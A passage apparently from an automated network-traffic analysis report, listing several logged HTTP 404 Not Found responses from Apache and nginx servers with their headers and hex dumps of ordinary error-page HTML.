20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:04:35 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:04:37 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:04:43 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:04:46 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:04:49 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:04:51 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:04:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 06:05:00 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
